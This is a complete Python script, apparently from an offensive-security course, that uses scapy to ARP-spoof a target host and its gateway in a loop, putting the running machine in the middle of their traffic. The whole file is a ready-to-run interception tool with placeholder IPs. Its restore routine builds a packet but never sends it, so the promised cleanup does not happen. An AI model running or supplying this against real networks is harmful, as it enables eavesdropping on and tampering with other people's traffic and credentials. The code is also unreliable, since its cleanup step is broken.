#! /usr/bin/env python

import scapy.all as scapy
import time

def get_mac(ip):
    arp_request =  scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast/arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]
    return answered_list[0][1].hwsrc

def spoof(target_ip, spoof_ip):
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet, verbose=False)

def restore(destination_ip, source_ip):
    destination_mac = get_mac(destination_ip)
    source_mac = get_mac(source_ip)
    packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac)

target_ip = "enter target ip"
router_ip = "gateway ip"

try:# do the below code
    sent_packets_count = 0
    while True:
        spoof(target_ip, router_ip)# target ip, router ip
        spoof(router_ip, target_ip)# router ip, target ip
        sent_packets_count = sent_packets_count +2
        print("\r[+] Packets sent: " + str(sent_packets_count), end="")
        time.sleep(2)
except KeyboardInterrupt:# to stop showing this error when you Ctrl C and display another message
    print("[+] Resetting ARP tables ....... Please wait")
    restore(target_ip, router_ip)# to restore the arp table when you quit
    restore(router_ip, target_ip)
